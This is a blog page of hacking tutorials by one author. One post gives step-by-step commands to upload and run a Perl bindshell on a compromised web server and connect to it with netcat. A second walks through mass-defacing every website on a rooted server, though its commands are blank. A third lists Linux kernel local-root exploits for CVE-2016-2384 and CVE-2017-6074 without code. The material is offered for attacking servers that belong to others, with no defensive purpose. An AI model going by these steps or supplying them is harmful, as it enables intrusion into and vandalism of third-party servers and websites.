Articles by "Rooting"

Okay this time I will give a simple tutorial on how to backconnect using bindshell . many problems that are often encountered when going to rooting the server are in step 1, namely backconnect, there may be many ways to do backconnect but this time I will give a tutorial by using bindshell


Material :
Bindshell script  : Here
Shell backdoor / webconsole shell : Here
netcat [if user windows] : Here 

Proof of Concept :
Step 1 :
Upload BindShell file, if web server not acceptable to upload shell using browser uploader u can try using command

Command Upload : 
Using Curl : curl -o bind.pl [scriptlink]
Using Wget : wget [scriptlink] -o bind.pl

Step 2 :
if u done upload the file go to cmd/Terminal [Netcat Folder]

Using Command :
Windows User : cd C:/[PathNetcat]/
Linux User : Direct order

Step 3 :
Command nc -vv [ServerIP] [Port]
if done not enter first
and go to shell backdoor/webconsole

Step 4 :
in web console u can command
Perl bind.pl 1337
and Press Enter

Notes : bind.pl => Name file bindshell , 1337 => Port

Step 5 :
Go back in cmd/Terminal
and Press Enter

and see what happens
Backconnect Success :p

PoC Video :



Notes : This trick does not run 100% on all servers and the important thing that must be considered is PERL, whether the web server is ON or OFF

(Zaenal Arifin)



Okay back again with me, this time I will give tutorial mass deface 1 server after rooting the server
Okay first we must have root access to the target server, if we can do backconnect first as usual, if you do not know how to backconnect you can see the tutorial here:





Okay if you already do backconnect next we as usual do shell spawing first by using command:






If it is next we can login root user first with the command 






if already entered into the root user next step you can enter into the root root first by typing commands :







now for the next step if you are already in root dir, you typed command to call our mass deface file by typing command :







if it appears 200 OK status means the file has been uploaded in the target server, the next step we go to dir tmp by typing the command :







if it's next we can upload the file again that is for now we will upload our deface page file with the command :







if the file is already uploaded our last step is to execute our mass deface file, we must go to root dir again to execute , if it's going to root dir, we type the command : 





and wait until the execution process is complete, if it is finished you can see if the web is hit by deface and check how many web that is in 1 server, you can use tools reverse ip

and see all the web that resides on one server that, yups web in 1 server it Pwnd. :p

PoC Video : 





Thanks you :p


Writed by : (Zaenal Arifin)


Whats is Linux Kernel ?


The Linux kernel is an open-source monolithic Unix-like computer operating system kernel. The Linux family of operating systems is based on this kernel and deployed on both traditional computer systems such as personal computers and servers, usually in the form of Linux distributions,[9] and on various embedded devices such as routers, wireless access points, PBXes, set-top boxes, FTA receivers, smart TVs, PVRs, and NAS appliances. The Android operating system for tablet computers, smartphones, and smartwatches uses services provided by the Linux kernel to implement its functionality. While the adoption on desktop computers is low, Linux-based operating systems dominate nearly every other segment of computing, from mobile devices to mainframes. As of November 2017, all of the world's 500 most powerful supercomputers run Linux.


Proof of Concept :


Kernel Exploits  is A bunch of proof-of-concept exploit for the Linux kernel.


Exploit Lists :


[+] CVE-2016-2384


This is a proof-of-concept exploit for the vulnerability in the usb-midi Linux kernel driver (CVE-2016-2384). Requires physical access to the machine.


[+] CVE-2017-6074


This is a proof-of-concept local root exploit for the vulnerability in the DCCP protocol implementation CVE-2017-6074. Includes a semireliable SMEP/SMAP bypass (the kernel might crash shorty after the exploit succeds).




A proof-of-concept local root exploit for CVE-2017-6074.

Includes a semireliable SMAP/SMEP bypass.
Tested on 4.4.0-62-generic #83-Ubuntu kernel.

Source: https://github.com/xairy
and use your brain to use.

Usage :



Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget